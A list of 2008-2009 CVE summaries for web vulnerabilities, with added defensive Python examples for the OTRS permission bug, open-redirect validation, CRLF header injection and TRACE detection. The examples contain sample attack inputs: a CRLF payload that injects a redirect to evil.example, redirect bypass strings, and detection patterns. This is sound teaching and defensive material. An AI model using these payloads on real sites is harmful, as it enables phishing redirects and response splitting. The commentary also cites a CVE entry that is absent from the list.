[CVE-2009-0260] Multiple cross-site scripting (XSS) vulnerabilities in action/AttachFile.py in MoinMoin before 1.8.1 allow remote attackers to inject arbitrary web script or HTML via an AttachFile action to the WikiSandBox component with (1) the rename parameter or (2) the drawing parameter (aka the basename variable).
[CVE-2009-0257] Multiple cross-site scripting (XSS) vulnerabilities in TYPO3 4.0.0 through 4.0.9, 4.1.0 through 4.1.7, and 4.2.0 through 4.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name and (2) content of indexed files to the (a) Indexed Search Engine (indexed_search) system extension
[CVE-2009-0256] Session fixation vulnerability in the authentication library in TYPO3 4.0.0 through 4.0.9, 4.1.0 through 4.1.7, and 4.2.0 through 4.2.3 allows remote attackers to hijack web sessions via unspecified vectors related to (1) frontend and (2) backend authentication.
[CVE-2009-0252] Multiple SQL injection vulnerabilities in default.asp in Enthrallweb eReservations allow remote attackers to execute arbitrary SQL commands via the (1) Login parameter (aka username field) or the (2) Password parameter (aka password field). NOTE: some of these details are obtained from third party information.
[CVE-2009-0250] Ryneezy phoSheezy 0.2 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the file containing the administrator's password hash via a direct request for config/password.
[CVE-2009-0249] Katy Whitton RankEm stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing credentials via a direct request for database/topsites.mdb.
[CVE-2009-0248] Cross-site scripting (XSS) vulnerability in rankup.asp in Katy Whitton RankEm allows remote attackers to inject arbitrary web script or HTML via the siteID parameter.
[CVE-2009-0247] The server for 53KF Web IM 2009 Home, Professional, and Enterprise editions relies on client-side protection mechanisms against cross-site scripting (XSS), which allows remote attackers to conduct XSS attacks by using a modified client to send a crafted IM message, related to the msg variable.
[CVE-2009-0245] Cross-site scripting (XSS) vulnerability in Usagi Project MyNETS 1.2.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2008-4629.
[CVE-2009-0240] listing.php in WebSVN 2.0 and possibly 1.7 beta, when using an SVN authz file, allows remote authenticated users to read changelogs or diffs for restricted projects via a modified repname parameter.
[CVE-2009-0239] Cross-site scripting (XSS) vulnerability in Windows Search 4.0 for Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows user-assisted remote attackers to inject arbitrary web script or HTML via a crafted file that appears in a preview in a search result, aka "Script Execution in Windows Search Vulnerability."
[CVE-2009-0214] Unspecified vulnerability in the WebFGServer application in AREVA e-terrahabitat 5.7 and earlier allows remote authenticated users to gain privileges via unknown vectors, aka PD32022.
[CVE-2009-0212] Unspecified vulnerability in the WebFGServer application in AREVA e-terrahabitat 5.7 and earlier allows remote attackers to cause a denial of service (system crash) via unknown vectors, aka PD32020.
[CVE-2009-0211] Unspecified vulnerability in the WebFGServer application in AREVA e-terrahabitat 5.7 and earlier allows remote attackers to cause a denial of service (system crash) via unknown vectors, aka PD32018.
[CVE-2009-0204] Cross-site scripting (XSS) vulnerability in HP Select Access 6.1 and 6.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-0194] The domain-locking implementation in the GARMINAXCONTROL.GarminAxControl_t.1 ActiveX control in npGarmin.dll in the Garmin Communicator Plug-In 2.6.4.0 does not properly enforce the restrictions that (1) download and (2) upload requests come from a web site specified by the user, which allows remote attackers to obtain sensitive information or reconfigure Garmin GPS devices via unspecified vectors related to a "synchronisation error."
[CVE-2009-0162] Cross-site scripting (XSS) vulnerability in Safari before 3.2.3, and 4 Public Beta, on Apple Mac OS X 10.5 before 10.5.7 and Windows allows remote attackers to inject arbitrary web script or HTML via a crafted feed: URL.
[CVE-2009-0157] Heap-based buffer overflow in CFNetwork in Apple Mac OS X 10.5 before 10.5.7 allows remote web servers to execute arbitrary code or cause a denial of service (application crash) via long HTTP headers.
[CVE-2009-0120] The IBM WebSphere DataPower XML Security Gateway XS40 with firmware 3.6.1.5 allows remote attackers to cause a denial of service (device reboot) by sending data over an established SSL connection, as demonstrated by the abc\r\n\r\n string data.
[CVE-2009-0107] Cross-site scripting (XSS) vulnerability in profile.php in PHPAuctions (aka PHPAuctionSystem) allows remote attackers to inject arbitrary web script or HTML via the user_id parameter.
[CVE-2009-0105] Cross-site scripting (XSS) vulnerability in index.php in EZpack 4.2b2 allows remote attackers to inject arbitrary web script or HTML via the mdfd parameter in a prog action.
[CVE-2009-0104] SQL injection vulnerability in index.php in EZpack 4.2b2 allows remote attackers to execute arbitrary SQL commands via the qType parameter in a webboard prog action.
[CVE-2009-0094] The WINS server in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 does not restrict registration of the (1) "wpad" and (2) "isatap" NetBIOS names, which allows remote authenticated users to hijack the Web Proxy Auto-Discovery (WPAD) and Intra-Site Automatic Tunnel Addressing Protocol (ISATAP) features, and conduct man-in-the-middle attacks by spoofing a proxy server or ISATAP route, by registering one of these names in the WINS database, aka "WPAD WINS Server Registration Vulnerability," a related issue to CVE-2007-1692.
[CVE-2009-0093] Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008, when dynamic updates are enabled, does not restrict registration of the "wpad" hostname, which allows remote authenticated users to hijack the Web Proxy Auto-Discovery (WPAD) feature, and conduct man-in-the-middle attacks by spoofing a proxy server, via a Dynamic Update request for this hostname, aka "DNS Server Vulnerability in WPAD Registration Vulnerability," a related issue to CVE-2007-1692.
[CVE-2009-0089] Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Vista Gold allows remote web servers to impersonate arbitrary https web sites by using DNS spoofing to "forward a connection" to a different https web site that has a valid certificate matching its own domain name, but not a certificate matching the domain name of the host requested by the user, aka "Windows HTTP Services Certificate Name Mismatch Vulnerability."
[CVE-2009-0081] The graphics device interface (GDI) implementation in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate input received from user mode, which allows remote attackers to execute arbitrary code via a crafted (1) Windows Metafile (aka WMF) or (2) Enhanced Metafile (aka EMF) image file, aka "Windows Kernel Input Validation Vulnerability."
[CVE-2009-0063] Cross-site scripting (XSS) vulnerability in the Control Center in Symantec Brightmail Gateway Appliance before 8.0.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-0059] The Cisco Wireless LAN Controller (WLC), Cisco Catalyst 6500 Wireless Services Module (WiSM), and Cisco Catalyst 3750 Integrated Wireless LAN Controller with software 4.x before 4.2.176.0 and 5.2.x before 5.2.157.0 allow remote attackers to cause a denial of service (device reload) via a web authentication (aka WebAuth) session that includes a malformed POST request to login.html.
[CVE-2009-0058] The Cisco Wireless LAN Controller (WLC), Cisco Catalyst 6500 Wireless Services Module (WiSM), and Cisco Catalyst 3750 Integrated Wireless LAN Controller with software 4.x before 4.2.176.0 and 5.x before 5.2 allow remote attackers to cause a denial of service (web authentication outage or device reload) via unspecified network traffic, as demonstrated by a vulnerability scanner.
[CVE-2009-0056] Cross-site request forgery (CSRF) vulnerability in the administration interface in Cisco IronPort Encryption Appliance 6.2.4 before 6.2.4.1.1, 6.2.5, 6.2.6, 6.2.7 before 6.2.7.7, 6.3 before 6.3.0.4, and 6.5 before 6.5.0.2
[CVE-2009-0055] Cross-site request forgery (CSRF) vulnerability in the administration interface in Cisco IronPort Encryption Appliance 6.2.4 before 6.2.4.1.1, 6.2.5, 6.2.6, 6.2.7 before 6.2.7.7, 6.3 before 6.3.0.4, and 6.5 before 6.5.0.2
[CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
[CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
[CVE-2009-0027] The request handler in JBossWS in JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP06 and 4.3 before 4.3.0.CP04 does not properly validate the resource path during a request for a WSDL file with a custom web-service endpoint, which allows remote attackers to read arbitrary XML files via a crafted request.
[CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
[CVE-2008-7312] The Filtering Service in Websense Enterprise 5.2 through 6.3 does not consider the IP address during URL categorization, which makes it easier for remote attackers to bypass filtering via an HTTP request, as demonstrated by a request to a compromised server associated with a specific IP address.
[CVE-2008-7279] The CustomerInterface component in Open Ticket Request System (OTRS) before 2.2.8 allows remote authenticated users to bypass intended access restrictions and access tickets of arbitrary customers via unspecified vectors.
[CVE-2008-7276] Kernel/System/Web/Request.pm in Open Ticket Request System (OTRS) before 2.3.2 creates a directory under /tmp/ with 1274 permissions, which might allow local users to bypass intended access restrictions via standard filesystem operations, related to incorrect interpretation of 0700 as a decimal value.
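The CVE-2008-7276 entry above is the classic decimal-versus-octal mode mistake: the text "0700" handed to mkdir as a decimal number is 700, which is 0o1274, a mode with the sticky bit set and group read/write/execute. This added example (not OTRS code; OTRS is Perl, the arithmetic is reproduced here in Python with int()) shows both readings and what the resulting directory looks like on disk:

```python
import os
import stat
import tempfile


def mode_from_string_decimal(text):
    """The bug: the textual mode "0700" read as a decimal number, which is what a
    Perl string does in numeric context and what int("0700") does here."""
    return int(text)          # 700 == 0o1274


def mode_from_string_octal(text):
    """The fix: parse the text as octal."""
    return int(text, 8)       # 0o700


def describe_dir_mode(mode):
    """ls-style rendering of a directory mode, e.g. 'drwx------'."""
    return stat.filemode(stat.S_IFDIR | mode)


def mkdir_and_report(path, mode):
    """Create path with mode (chmod afterwards so the umask does not mask the demo)
    and return the permission bits actually set."""
    os.mkdir(path, mode)
    os.chmod(path, mode)
    return stat.S_IMODE(os.stat(path).st_mode)


def demo():
    """Returns (buggy_mode, fixed_mode) as observed on two freshly created directories."""
    with tempfile.TemporaryDirectory() as base:
        buggy_dir = os.path.join(base, "otrs-buggy")
        fixed_dir = os.path.join(base, "otrs-fixed")
        buggy = mkdir_and_report(buggy_dir, mode_from_string_decimal("0700"))
        fixed = mkdir_and_report(fixed_dir, mode_from_string_octal("0700"))
        # Give the owner back read/execute so cleanup can remove the directories.
        os.chmod(buggy_dir, 0o700)
    return buggy, fixed


if __name__ == "__main__":
    buggy, fixed = demo()
    print("decimal 700  ->", oct(buggy), describe_dir_mode(buggy))
    print("octal   0700 ->", oct(fixed), describe_dir_mode(fixed))
```

The rendering makes the consequence obvious: the "private" temp directory is group-writable and the owner cannot even list it, which is exactly the class of bug a filesystem-permission audit should grep for (string modes passed to mkdir/chmod without an explicit octal conversion).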
[CVE-2008-7275] Multiple cross-site scripting (XSS) vulnerabilities in Open Ticket Request System (OTRS) before 2.3.3 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) AgentTicketMailbox or (2) CustomerTicketOverView.
[CVE-2008-7274] IBM WebSphere Application Server (WAS) 6.1.0.9, when the JAAS Login functionality is enabled, allows attackers to perform an internal application hashtable login by (1) not providing a password or (2) providing an empty password.
[CVE-2008-7271] Multiple cross-site scripting (XSS) vulnerabilities in the Help Contents web application (aka the Help Server) in Eclipse IDE, possibly 3.3.2, allow remote attackers to inject arbitrary web script or HTML via (1) the searchWord parameter to help/advanced/searchView.jsp or (2) the workingSet parameter in an add action to help/advanced/workingSetManager.jsp, a different issue than CVE-2010-4647.
[CVE-2008-7269] Open redirect vulnerability in api.php in SiteEngine 5.x allows user-assisted remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the forward parameter in a logout action.
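The open-redirect entries for Ultraseek (CVE-2009-0347, url parameter) and SiteEngine (CVE-2008-7269, forward parameter) share one root cause: a user-supplied destination passed to a redirect without validation. The following is an added example (not code from either product) of the validation a practitioner would put in front of such a redirect; the allow-listed host is an assumption, and the checks cover the usual bypass shapes (scheme-relative `//host`, backslash variants, userinfo tricks, non-http schemes and control characters):

```python
from urllib.parse import urlsplit

# Assumed allow-list for absolute redirect targets; a real application uses its own hosts.
ALLOWED_HOSTS = {"search.example.com"}


def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    """True only for a same-site absolute path or an http(s) URL on an allowed host."""
    if not isinstance(target, str) or not target:
        return False
    # Control characters enable header injection and browser normalisation tricks.
    if any(ord(c) < 0x20 or c == "\x7f" for c in target):
        return False
    parts = urlsplit(target)
    if parts.scheme:
        if parts.scheme.lower() not in ("http", "https"):
            return False          # javascript:, data:, vbscript:, ...
        host = parts.hostname     # strips port and any user:pass@ prefix
        return host is not None and host.lower() in allowed_hosts
    if parts.netloc:
        return False              # scheme-relative form: //evil.example/
    # Relative target: a single leading slash only. Browsers turn a backslash into a
    # slash, so "/\evil.example" would be resolved as "//evil.example".
    return target.startswith("/") and not target.startswith(("//", "/\\"))


def choose_redirect(target, fallback="/"):
    """Destination to actually send: the requested one if safe, else the fallback."""
    return target if is_safe_redirect(target) else fallback


if __name__ == "__main__":
    for candidate in ("/results?q=x", "//evil.example/", "/\\evil.example",
                      "javascript:alert(1)", "https://search.example.com@evil.example/"):
        print(repr(candidate), "->", choose_redirect(candidate))
```

Run the function on the decoded parameter value, after the framework has performed its one round of percent-decoding; comparing against an allow-list of hosts rather than a deny-list is what keeps the subdomain and userinfo variants out.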
[CVE-2008-7266] Cross-site scripting (XSS) vulnerability in an unspecified Shockwave Flash file in RSA Adaptive Authentication 2.x and 5.7.x allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2008-7257] CRLF injection vulnerability in +webvpn+/index.html in WebVPN on Cisco Adaptive Security Appliances (ASA) 5580 series devices with software before 8.1(2) allows remote attackers to inject arbitrary HTTP headers as demonstrated by a redirect attack involving a %0d%0aLocation%3a sequence in a URI, or conduct HTTP response splitting attacks via unspecified vectors, aka Bug ID CSCsr09163.
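The CVE-2008-7257 entry describes a %0d%0aLocation%3a sequence in the URI turning into a second Location header. This added example (not Cisco code; the URI and host names are constructed placeholders) shows the naive decode-and-concatenate handler, the extra header a client ends up seeing, the hardened version that refuses control characters in header values, and a log-side detector for the encoded forms:

```python
from urllib.parse import unquote

# Constructed request URI modelled on the advisory's %0d%0aLocation%3a sequence.
ATTACK_URI = "/+webvpn+/index.html?next=/portal%0d%0aLocation%3a%20https://evil.example/"


def redirect_target(request_uri):
    """What a naive handler does: take the query value and percent-decode it."""
    query = request_uri.split("?", 1)[1] if "?" in request_uri else ""
    value = query.split("=", 1)[1] if "=" in query else ""
    return unquote(value)


def build_redirect_vulnerable(target):
    """Raw concatenation: a decoded CR LF inside `target` starts a new header line."""
    return "HTTP/1.1 302 Found\r\nLocation: " + target + "\r\nContent-Length: 0\r\n\r\n"


def assert_header_safe(value):
    """Reject anything that can terminate a header line or the whole header block."""
    if any(c in value for c in "\r\n\x00"):
        raise ValueError("control character in header value")
    return value


def build_redirect_hardened(target):
    return ("HTTP/1.1 302 Found\r\nLocation: " + assert_header_safe(target)
            + "\r\nContent-Length: 0\r\n\r\n")


def header_names(raw_response):
    """Names of the header fields a client would parse, in order."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    return [line.split(":", 1)[0] for line in head.split("\r\n")[1:]]


def looks_like_crlf_injection(request_uri):
    """Log-side check: CR or LF in the request line, raw, encoded or double-encoded."""
    lowered = request_uri.lower()
    return any(tok in lowered for tok in ("%0d", "%0a", "%250d", "%250a", "\r", "\n"))


if __name__ == "__main__":
    target = redirect_target(ATTACK_URI)
    print("vulnerable headers:", header_names(build_redirect_vulnerable(target)))
    try:
        build_redirect_hardened(target)
    except ValueError as exc:
        print("hardened handler refused:", exc)
    print("flag in logs:", looks_like_crlf_injection(ATTACK_URI))
```

Modern HTTP libraries apply the same refusal in their header-setting APIs; the check is still worth having wherever a response is assembled by string concatenation, as embedded web front ends often do.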
[CVE-2008-7253] The default configuration of the web server in IBM Lotus Domino Server, possibly 6.0 through 8.0, enables the HTTP TRACE method, which makes it easier for remote attackers to steal cookies and authentication credentials via a cross-site tracing (XST) attack, a related issue to CVE-2004-2763 and CVE-2005-3398.
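The CVE-2008-7253 entry is about TRACE being enabled by default, which lets cross-site tracing echo a victim's Cookie and Authorization headers back to script. This added example (not Lotus Domino code; both servers are constructed stand-ins on loopback) implements the check a scanner performs, sending a raw TRACE with a canary cookie and treating a 200 response that echoes the canary as "enabled", and runs it against one server that echoes TRACE and one that refuses it:

```python
import http.server
import socket
import threading


class TraceEchoHandler(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for a server with TRACE on: the response body is the
    request itself, Cookie and Authorization headers included."""

    def do_TRACE(self):
        body = (self.requestline + "\r\n" + str(self.headers)).encode()
        self.send_response(200)
        self.send_header("Content-Type", "message/http")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


class TraceRefusedHandler(http.server.BaseHTTPRequestHandler):
    """The same server with TRACE turned off."""

    def do_TRACE(self):
        self.send_error(405)

    def log_message(self, *args):
        pass


def start_server(handler_cls):
    """Bind an ephemeral loopback port and serve in a daemon thread."""
    server = http.server.HTTPServer(("127.0.0.1", 0), handler_cls)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def trace_enabled(host, port, canary="xstcheck=1"):
    """Send a raw TRACE carrying a canary cookie; TRACE is considered enabled when
    the server answers 200 and the canary comes back in the response."""
    request = (
        f"TRACE / HTTP/1.1\r\nHost: {host}\r\nCookie: {canary}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    response = b"".join(chunks)
    status_line = response.split(b"\r\n", 1)[0]
    return b" 200 " in status_line and canary.encode() in response


if __name__ == "__main__":
    for name, handler in (("echo", TraceEchoHandler), ("refused", TraceRefusedHandler)):
        srv = start_server(handler)
        print(name, "server: TRACE enabled =", trace_enabled(*srv.server_address))
        srv.shutdown()
```

Against a real host, replace the loopback address with the target and keep the canary: a server that merely returns 200 with an empty body is not exploitable for XST, so the echo check matters.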
[CVE-2008-7250] Cross-site scripting (XSS) vulnerability in Squid Analysis Report Generator (Sarg) 2.2.4 allows remote attackers to inject arbitrary web script or HTML via a JavaScript onload event in the User-Agent header, which is not properly handled when displaying the Squid proxy log. NOTE: this issue exists because of an incomplete fix for CVE-2008-1168.
[CVE-2008-7242] Multiple cross-site scripting (XSS) vulnerabilities in MODx CMS 0.9.6.1 and 0.9.6.1p1 allow remote attackers to inject arbitrary web script or HTML via the (1) search, (2) "a," (3) messagesubject, and (4) messagebody parameters to certain pages as reachable from manager/index.php
[CVE-2008-7240] Directory traversal vulnerability in include/unverified.inc.php in Linux Web Shop (LWS) php User Base 1.3beta allows remote attackers to include and execute arbitrary local files via the template parameter.
[CVE-2008-7231] Cross-site scripting (XSS) vulnerability in Meridio Document and Records Management before 4.3 SR1 allows remote authenticated users to inject arbitrary web script or HTML via the Title field in a (1) document (subGeneralProps:dmpvDocTitle:PROP_W_title) or (2) container (subGeneralProps:dmpvContainerTitle:PROP_W_title).
[CVE-2008-7223] Multiple cross-site scripting (XSS) vulnerabilities in LinPHA before 1.3.3 allow remote attackers to inject arbitrary web script or HTML via (1) ftp/index.php, (2) viewer.php, (3) functions/other.php, (4) include/left_menu.class.php, or (5) plugins/stats/stats_view.php.
[CVE-2008-7222] Cross-site scripting (XSS) vulnerability in system/admin.php in RunCMS 1.6.1 allows remote attackers to inject arbitrary web script or HTML via the rank_title parameter in a RankForumAdd action.
[CVE-2008-7213] Cross-site scripting (XSS) vulnerability in mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php in MOStlyCE before 2.4, as used in Mambo 4.6.3 and earlier, allows remote attackers to inject arbitrary web script or HTML via the Command parameter.
[CVE-2008-7202] Multiple cross-site scripting (XSS) vulnerabilities in OpenWebMail before 2.53 (Stable) allow remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2008-7184] Cross-site scripting (XSS) vulnerability in Diigo Toolbar and Diigolet allows remote attackers to inject arbitrary web script or HTML via a public comment.
[CVE-2008-7175] Cross-site scripting (XSS) vulnerability in wp-admin/admin.php in NextGEN Gallery 0.96 and earlier plugin for Wordpress allows remote attackers to inject arbitrary web script or HTML via the picture description field in a page edit action.
[CVE-2008-7171] Multiple cross-site scripting (XSS) vulnerabilities in Lightweight news portal (LNP) 1.0b allow remote attackers to inject arbitrary web script or HTML via the (1) photo parameter to show_photo.php, (2) potd parameter to show_potd.php, or (3) the Current question field in a vote action to admin.php.
[CVE-2008-7150] Cross-site scripting (XSS) vulnerability in Refine by Taxonomy 5.x before 5.x-0.1, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via a taxonomy term, which is not properly handled by refine_by_taxo when displaying tags.
[CVE-2008-7147] Multiple cross-site scripting (XSS) vulnerabilities in IntraLearn Software IntraLearn 2.1, and possibly other versions before 4.2.3, allow remote attackers to inject arbitrary web script or HTML via the (1) outline and (2) course parameters to library/description_link.cfm, or the (3) records_to_display and (4) the_start parameters to library/courses_catalog.cfm.
[CVE-2008-7141] Cross-site scripting (XSS) vulnerability in setup.php in @lex Poll 2.1 allows remote attackers to inject arbitrary web script or HTML via the language_setup parameter. NOTE: the provenance of this information is unknown
[CVE-2008-7140] Multiple cross-site scripting (XSS) vulnerabilities in @lex Guestbook 4.0.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) language_setup parameter to setup.php or (2) test parameter to index.php. NOTE: the provenance of this information is unknown
[CVE-2008-7134] Multiple cross-site scripting (XSS) vulnerabilities in the default URI in Chris LaPointe RedGalaxy Download Center 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) file parameter, (2) message parameter in a login action, (3) category parameter in a browse action, (4) now parameter, or (5) search parameter in a search_results action. NOTE: the provenance of this information is unknown
[CVE-2008-7133] Multiple cross-site scripting (XSS) vulnerabilities in onlinetools.org EasyImageCatalogue 1.3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) search and (2) d parameters to index.php, (3) dir parameter to thumber.php, and the d parameter to (4) describe.php and (5) addcomment.php. NOTE: the provenance of this information is unknown
[CVE-2008-7132] Cross-site scripting (XSS) vulnerability in index.php in Nuked-Klan 1.3 beta allows remote attackers to inject arbitrary web script or HTML via the nuked_nude parameter. NOTE: the provenance of this information is unknown
[CVE-2008-7121] Cross-site scripting (XSS) vulnerability in Mr. CGI Guy Hot Links SQL-PHP 3 and earlier allows remote attackers to inject arbitrary web script or HTML via the search bar.
[CVE-2008-7119] SQL injection vulnerability in item.php in WeBid auction script 0.5.4 allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2008-7118] WeBid auction script 0.5.4 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain SQL query logs via a direct request for logs/cron.log.
[CVE-2008-7117] eledicss.php in WeBid auction script 0.5.4 allows remote attackers to modify arbitrary cascading style sheets (CSS) files via a certain request with the file parameter set to style.css. NOTE: this can probably be leveraged for cross-site scripting (XSS) attacks.
[CVE-2008-7116] SQL injection vulnerability in the admin panel (admin/) in WeBid auction script 0.5.4 allows remote attackers to execute arbitrary SQL commands via the username.
[CVE-2008-7108] Multiple cross-site scripting (XSS) vulnerabilities in Carmosa phpCart 3.4 through 4.6.4 allow remote attackers to inject arbitrary web script or HTML via the (1) quantity or (2) Add Engraving fields to the default URI
[CVE-2008-7107] easdrv.sys in ESET Smart Security 3.0.667.0 allows local users to cause a denial of service (crash) via a crafted IOCTL 0x222003 request to the \\.\easdrv device interface.
[CVE-2008-7098] Multiple cross-site scripting (XSS) vulnerabilities in Qsoft K-Rate Premium allow remote attackers to inject arbitrary web script or HTML via the blog, possibly the (1) Title and (2) Text fields
[CVE-2008-7092] Multiple cross-site scripting (XSS) vulnerabilities in Unica Affinium Campaign 7.2.1.0.55 allow remote attackers to inject arbitrary web script or HTML via a Javascript event in the (1) url, (2) PageName, and (3) title parameters in a CustomBookMarkLink action to Campaign/Campaign
[CVE-2008-7089] Cross-site scripting (XSS) vulnerability in Pligg 9.9 and earlier allows remote attackers to inject arbitrary web script or HTML via the keyword parameter in a search action to user.php and other unspecified vectors.
[CVE-2008-7084] Directory traversal vulnerability in the web server 1.0 in Velocity Security Management System allows remote attackers to read arbitrary files via a .. (dot dot) in the URI.
[CVE-2008-7080] Team PHP PHP Classifieds Script stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain database credentials via a direct request for admin/backup/datadump.sql.
[CVE-2008-7073] PHP remote file inclusion vulnerability in lib/action/rss.php in RSS module 0.1 for Pie Web M{a,e}sher, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the lib parameter.
[CVE-2008-7072] Cross-site scripting (XSS) vulnerability in index.php in Chipmunk Topsites allows remote attackers to inject arbitrary web script or HTML via the start parameter.
[CVE-2008-7069] All Club CMS (ACCMS) 0.0.2 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain database configuration information, including credentials, via a direct request to accms.dat.
[CVE-2008-7063] Ocean12 FAQ Manager Pro stores sensitive data under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for admin/o12faq.mdb.
[CVE-2008-7060] Multiple cross-site scripting (XSS) vulnerabilities in One-News Beta 2 allow remote attackers to inject arbitrary HTML and web script via the (1) title or (2) content parameters in a news item to add.php, and the (3) itemnum, (4) author, or (5) comment parameters in a comment to index.php. NOTE: vectors 1 and 2 require user authentication.
[CVE-2008-7057] Cross-site scripting (XSS) vulnerability in merchandise.php in BandSite CMS 1.1.4 allows remote attackers to inject arbitrary HTML or web script via the type parameter.
[CVE-2008-7048] Multiple cross-site scripting (XSS) vulnerabilities in NatterChat 1.12 allow remote attackers to inject arbitrary web script or HTML via the (1) txtUsername parameter to registerDo.asp, as invoked from register.asp, or (2) txtRoomName parameter to room_new.asp. NOTE: these issues might be resultant from XSS in SQL error messages.
[CVE-2008-7043] Cross-site scripting (XSS) vulnerability in register.php in FreshScripts Fresh Email Script 1.0 through 1.11 allows remote attackers to inject arbitrary web script or HTML via the Email parameter. NOTE: this can be leveraged to modify cookies and conduct session fixation attacks.
[CVE-2008-7039] Cross-site scripting (XSS) vulnerability in admin/comments.php in Gelato CMS 0.95 allows remote attackers to inject arbitrary web script or HTML via the content parameter in a comment. NOTE: some of these details are obtained from third party information.
[CVE-2008-7037] The Sidebar gadget in ITN News Gadget (aka ITN Hub Gadget) 1.06 for Windows Vista, and possibly other versions before 1.23, allows remote web servers or man-in-the-middle attackers to execute arbitrary commands via script in a short_title response.
[CVE-2008-7036] Multiple cross-site scripting (XSS) vulnerabilities in index.php in DevTracker module 3.0 for bcoos 1.1.11 and earlier, and DevTracker module 0.20 for E-XooPS 1.0.8 and earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) direction and (2) order_by parameters.
[CVE-2008-7035] Cross-site scripting (XSS) vulnerability in an unspecified component in Simple Machines phpRaider 1.0.7 allows remote attackers to inject arbitrary web script or HTML via the resistance field. NOTE: the provenance of this information is unknown.
[CVE-2008-7032] Web Management Console Cross-site request forgery (CSRF) vulnerability in the web management console in F5 BIG-IP 9.4.3 allows remote attackers to hijack the authentication of administrators for requests that create new administrators and execute shell commands, as demonstrated using tmui/Control/form.
[CVE-2008-7030] Multiple SQL injection vulnerabilities in Site2Nite Real Estate Web allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password field to an unspecified component, possibly agentlist.asp. NOTE: this issue was disclosed by an unreliable researcher, so it might be incorrect.
[CVE-2008-7018] Cross-site scripting (XSS) vulnerability in NashTech Easy PHP Calendar 6.3.25 allows remote attackers to inject arbitrary web script or HTML via the Details field (descr parameter) in an Add New Event action in an unspecified request as generated by an add action in index.php.
[CVE-2008-7017] Cross-site scripting (XSS) vulnerability in analyse.php in CAcert 20080921, and possibly other versions before 20080928, allows remote attackers to inject arbitrary web script or HTML via the CN (CommonName) field in the subject of an X.509 certificate.
[CVE-2008-7008] HyperStop Web Host Directory 1.2 allows remote attackers to bypass authentication and download a database backup via a direct request to admin/backup/db.
[CVE-2008-6994] Stack-based buffer overflow in the SaveAs feature (SaveFileAsWithFilter function) in win_util.cc in Google Chrome 0.2.149.27 allows user-assisted remote attackers to execute arbitrary code via a web page with a long TITLE element, which triggers the overflow when the user saves the page and a long filename is generated. NOTE: it might be possible to exploit this issue via an HTTP response that includes a long filename in a Content-Disposition header.
[CVE-2008-6991] SQL injection vulnerability in public/page.php in Websens CMSbright allows remote attackers to execute arbitrary SQL commands via the id_rub_page parameter.
[CVE-2008-6988] Multiple cross-site scripting (XSS) vulnerabilities in Easy Photo Gallery (aka Ezphotogallery) 2.1 allow remote attackers to inject arbitrary web script or HTML via the (1) galleryid parameter to gallery.php, and the (2) size or (3) imageid parameters to show.php.
[CVE-2008-6987] Unrestricted file upload vulnerability in eZoneScripts Dating Website script allows remote attackers to execute arbitrary code via unknown vectors. NOTE: the provenance of this information is unknown.
[CVE-2008-6982] Cross-site scripting (XSS) vulnerability in index.php in devalcms 1.4a allows remote attackers to inject arbitrary web script or HTML via the currentpath parameter.
[CVE-2008-6979] Cross-site scripting (XSS) vulnerability in as_archives.php in phpAdultSite CMS, possibly 2.3.2, allows remote attackers to inject arbitrary web script or HTML via the results_per_page parameter to index.php. NOTE: some of these details are obtained from third party information. NOTE: this issue might be resultant from a separate SQL injection vulnerability.
